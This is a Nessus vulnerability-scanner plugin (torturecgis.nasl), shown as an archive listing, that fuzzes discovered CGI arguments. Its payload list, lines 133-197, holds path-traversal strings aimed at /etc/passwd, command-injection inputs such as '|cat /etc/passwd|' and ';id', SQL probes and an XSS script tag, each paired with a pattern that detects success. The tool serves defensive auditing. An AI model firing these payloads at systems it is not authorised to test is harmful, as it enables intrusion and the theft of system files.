home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / torturecgis.nasl < prev    next >
Encoding:
Text File  |  2005-01-14  |  8.3 KB  |  320 lines
  1. #
  2. # TORTURECGIS
  3. #
  4. #
  5. # Written by Renaud Deraison <deraison@nessus.org>
  6. #
  7. #
  8. # This plugin uses the data collected by webmirror.nasl to try
  9. # to supply bogus values in the remote CGIs. It's not very likely
  10. # to work, but it should simplify the work of a web auditor
  11. #
  12. #
  13. # THIS PLUGIN IS IN ITS ALPHA STAGE.
  14. #
  15. # See the Nessus Scripts License for details
  16. #
  17.  
  18. if(description)
  19. {
  20.  script_id(10672);
  21.  script_version ("$Revision: 1.41 $");
  22. # script_cve_id("CVE-MAP-NOMATCH");
  23.  
  24.  name["english"] = "Unknown CGIs arguments torture";
  25.  name["francais"] = "Unknown CGIs arguments torture";
  26.  script_name(english:name["english"], francais:name["francais"]);
  27.  
  28.  desc["english"] = "
  29. This script 'tortures' the arguments of the remote CGIs
  30. by attempting to pass common CGI programming errors as
  31. arguments (../../etc/passwd et al.).
  32.  
  33. *** IN NO WAY THIS SCRIPT IS AS GOOD AS A HUMAN BEING TO
  34. *** DO THIS KIND OF JOB
  35.  
  36. Risk factor : None to High";
  37.  
  38.  
  39.  
  40.  script_description(english:desc["english"]);
  41.  
  42.  summary["english"] = "Tortures the arguments of the remote CGIs";
  43.  
  44.  
  45.  script_summary(english:summary["english"]);
  46.  
  47.  script_category(ACT_DESTRUCTIVE_ATTACK); # Will mess the remote server
  48.  
  49.  
  50.  script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
  51.         francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
  52.  family["english"] = "CGI abuses";
  53.  family["francais"] = "Abus de CGI";
  54.  script_family(english:family["english"], francais:family["francais"]);
  55.  script_dependencie("find_service.nes", "httpver.nasl", "webmirror.nasl");
  56.  script_require_ports("Services/www", 80);
  57.  script_timeout(360); 
  58.  
  59.  script_add_preference(name:"Send POST requests",
  60.                        type:"checkbox", value:"no");
  61.  
  62.  exit(0);
  63. }
  64.  
  65.  
  66. include("http_func.inc");
  67. include("http_keepalive.inc");
  68.  
  69.  
  70. success = "";
  71. pricereport = "";
  72.  
  73.  
  74. do_post = script_get_preference("Send POST requests");
  75. if ( do_post && "yes" >< do_post ) do_post = 1;
  76. else do_post = 0;
  77.  
  78. function test(req, pattern)
  79. {
  80.  local_var str, r;
  81. # display(req, "\n");
  82.  
  83.  str = http_get(item:req, port:port);
  84.  r = http_keepalive_send_recv(port:port, data:str);
  85. # display(r);
  86.  if ( r == NULL ) exit(0);
  87.  if(egrep(pattern:pattern, string:r))
  88.         {
  89.       success = success + string("\n") + req;
  90.      r = 0;
  91.      }
  92.  return(0);
  93. }
  94.  
  95.  
  96. function test_post(req, pattern)
  97. {
  98.  local_var str, r, variables;
  99. # display(req, "\n");
  100.  
  101.  variables = ereg_replace(pattern:"^([^\?])\?(.*)", replace:"\2", string:req);
  102.  req = ereg_replace(pattern:"^([^\?])\?(.*)", replace:"\1", string:req);
  103.  
  104.  str = string("POST ", req, " HTTP/1.1\r\n", 
  105.               "Host: ", host, ":", port, "\r\n", 
  106.               "Content-Type: application/x-www-form-urlencoded\r\n", 
  107.               "Content-Length: ", strlen(variables), "\r\n\r\n", variables);
  108.  
  109.  r = http_keepalive_send_recv(port:port, data:str);
  110. # display(r);
  111.  if ( r == NULL ) exit(0);
  112.  if(egrep(pattern:pattern, string:r))
  113.         {
  114.       success = success + string("\n") + req;
  115.      r = 0;
  116.      }
  117.  return(0);
  118. }
  119.  
  120.  
  121. port = get_http_port(default:80);
  122.  
  123. if(!get_port_state(port))exit(0);
  124.  
  125.  
  126. # The syntax is :
  127. # argument                        expected result
  128.  
  129.  
  130. #------------------------------#
  131. # Remote file listing (20pts)  #
  132. #------------------------------#
  133. flaws[0]="/etc/passwd";                    pat[0]="root:.*:0:[01]:";
  134. flaws[1]="../../../../../../../../etc/passwd";            pat[1]=pat[0];
  135. flaws[2]="../../../../../../../../etc/passwd%00";        pat[2]=pat[0];
  136. flaws[3]="../../../../../../../../etc/passwd%00.html";        pat[3]=pat[0];
  137. flaws[4]="../../../../../../../../etc/passwd%00index.html";     pat[4]=pat[0];
  138. flaws[5]="%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd";
  139.                                 pat[5]=pat[0];
  140.  # (this one is ../../../etc/passwd uuencoded - at least one cgi was vulnerable to this)        
  141. flaws[6]="Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAo=";        pat[6]=pat[0];
  142. flaws[7]="%60/etc/passwd%60";                    pat[7]=pat[0];
  143.  
  144. flaws[8]=string("..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini");    pat[8]="\[windows\]";
  145. flaws[9]=string("..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini");    pat[9]="\[fonts\]";
  146. flaws[10]="../../../../../../../../windows/win.ini";            pat[10]="\[windows\]";
  147. flaws[11]="../../../../../../../../winnt/win.ini";            pat[11]="\[fonts\]";
  148.  
  149.  
  150.  
  151. #----------------------------#
  152. # Directory listing (10pts ) #
  153. #----------------------------#
  154. flaws[12]="/etc";                        pat[12]="resolv\.conf";
  155. flaws[13]="../../../../../../../../etc";            pat[13]="resolv\.conf";
  156. flaws[14]="..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc";    pat[14]="resolv\.conf";
  157. flaws[15]="%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc";
  158.                                 pat[15]="resolv\.conf";
  159.                                 
  160. flaws[16]="../../../../../../../winnt";                pat[16]="win\.ini";
  161. flaws[17]="../../../../../../../windows";            pat[17]="win\.ini";
  162. flaws[18]=string("..\\..\\..\\..\\..\\..\\..\\windows");    pat[18]="win\.ini";
  163. flaws[19]=string("..\\..\\..\\..\\..\\..\\..\\winnt");        pat[19]="win\.ini";
  164.                     
  165.  
  166. #------------------------------#
  167. # Arbitrary commands (100 pts) #
  168. #------------------------------#
  169. flaws[20]="%0Acat%20/etc/passwd";                pat[20]=pat[0];
  170. flaws[21]="|cat%20/etc/passwd|";                pat[21]=pat[0];
  171. flaws[22]="x%0Acat%20/etc/passwd";                pat[22]=pat[0];
  172. flaws[23]="%3Bid";                        pat[23]="uid=[0-9]";
  173. flaws[24]="|/bin/id";                        pat[24]=pat[23];
  174. flaws[25]="|/usr/bin/id";                    pat[25]=pat[23];
  175. flaws[26]="|id|";                        pat[26]=pat[23];
  176. flaws[27]="VALUE;/bin/id";                    pat[27]=pat[23];
  177. flaws[28]="VALUE;/usr/bin/id";                    pat[28]=pat[23];
  178. flaws[29]="VALUE%0Acat%20/etc/passwd";                pat[29]=pat[23];
  179. flaws[30]="VALUE%20|%20dir";                    pat[30]="<DIR>";
  180.  
  181.  
  182. #
  183. # SQL stuff
  185. flaws[31]="whatever)";                        pat[31]="PL/SQL";
  186. flaws[32]="'";                            pat[32]="MySQL query";
  187.  
  188.  
  190. # XSS (0pt)
  192. flaws[33]="<script>alert('foo');</script>";            pat[33]="<script>alert\('foo'\);</script>";
  193.  
  194. #
  195. # Code injection
  197. flaws[34]="http://xxxxxxxxxxxx/";                pat[34]="http://xxxxxxxxxxxx//?[a-z,A-Z,0-9]";
  198.  
  199.  
  200.  
  201. cgis = get_kb_list(string("www/", port, "/cgis"));
  202. if(isnull(cgis))exit(0);
  203.  
  204. # As get_kb_list may return an array with duplicated keys, we call
  205. # make_list() to clean it, just in case.
  206. cgis = make_list(cgis);
  207.  
  208. foreach cgi (cgis)
  209. {
  210.  cgi_name = ereg_replace(string:cgi,
  211.               pattern:"(.*) - .*",
  212.              replace:"\1");
  213.  cgi = cgi - cgi_name;
  214.  cgi = cgi - string(" - ");
  215.  
  216.  
  217.  
  218.  
  219.  num_args = 0;
  220.  while(cgi)
  221.  {
  222.   args[num_args] = ereg_replace(string:cgi,
  223.                   pattern:"([^ ]*).*",
  224.                 replace:"\1");
  225.   if(!args[num_args])
  226.   {
  227.    cgi = "";
  228.   }    
  229.  else
  230.   {
  231.   cgi = cgi - args[num_args];
  232.   cgi = cgi - " ";
  233.   }
  234.   
  235.   str = string(args[num_args]);
  236.   if(ereg(pattern:"^\[.*", string:str))
  237.   {
  238.    tmp = string(ereg_replace(pattern:"^\[(.*)\]",
  239.                     string:str,
  240.                 replace:"\1"));                    
  241.    vals[num_args - 1] = tmp;
  242.    if(ereg(pattern:"[0-9]*\$[0-9]*", string:tmp))
  243.    {
  244.     pricereport = string(pricereport,
  245.         args[num_args - 1], " - ", tmp, "\n");
  246.     
  247.    }            
  248.   }
  249.   else {
  250.      vals[num_args] = 0;
  251.     num_args = num_args + 1;
  252.     }
  253.  }
  254.  
  255.  
  256.  #
  257.  # Some e-commerce sites have the prices of the items used as hidden values.
  258.  # which is a big no-no
  259.  #
  260.  if(strlen(pricereport))
  261.  {
  262.   report = string("The cgi '", cgi_name, "' seems to pass object prices as values for the following\n",
  263. "arguments :\n",
  264. pricereport,
  265. "\n",
  266. "If that proves to be exact, an attacker may use this flaw to buy goods on the remote site at\n",
  267. "the prices he choose.\n",
  268. "Solution : never rely on data passed by the client when writing a CGI\n",
  269. "Risk factor : High\n",
  270. "Note : this alert is very likely to be a false positive");
  271.  security_warning(port:port, data:report);
  272.  }
  273.  
  274.  if(num_args)
  275.  { 
  276.  for(i=0;i<num_args;i=i+1)
  277.  {
  278.   for(j=0;flaws[j];j=j+1)
  279.   {
  280.    req = "";
  281.    for(k=0;k<num_args;k=k+1)
  282.    {
  283.     if(!(k == i))
  284.     {
  285.      if(strlen(vals[k]))
  286.       _def = string(vals[k]);
  287.      else
  288.       _def = string("nessus");
  289.       
  290.      req = string(req, string(args[k]), "=", _def, "&");
  291.     }
  292.    }
  293.    fl = ereg_replace(string:flaws[j], pattern:"VALUE",
  294.              replace:vals[i]);
  295.    req = string(string(cgi_name), "?", req, string(args[i]), "=") + fl;
  296.    test(req:req, pattern:pat[j]);
  297.    if ( do_post ) test_post(req:req, pattern:pat[j]);
  298.   }
  299.  }
  300.  }
  301.  else
  302.  {
  303.   for(j=0;flaws[j];j=j+1)
  304.   {
  305.    fl = ereg_replace(string:flaws[j], pattern:"VALUE",
  306.              replace:"nessus");
  307.    req = string(cgi_name, "?") + fl;
  308.    test(req:req,pattern:pat[j]);
  309.    if ( do_post ) test_post(req:req,pattern:pat[j]);
  310.    }
  311.  }
  312. }
  313.  
  314. if(strlen(success))
  315. {
  316. report = string("The following requests seem to allow the reading of\n",
  317. "sensitive files or XSS. You should manually try them to see if anything bad happens : ", success);
  318.  security_hole(port:port, data:report);
  319. }             
  320.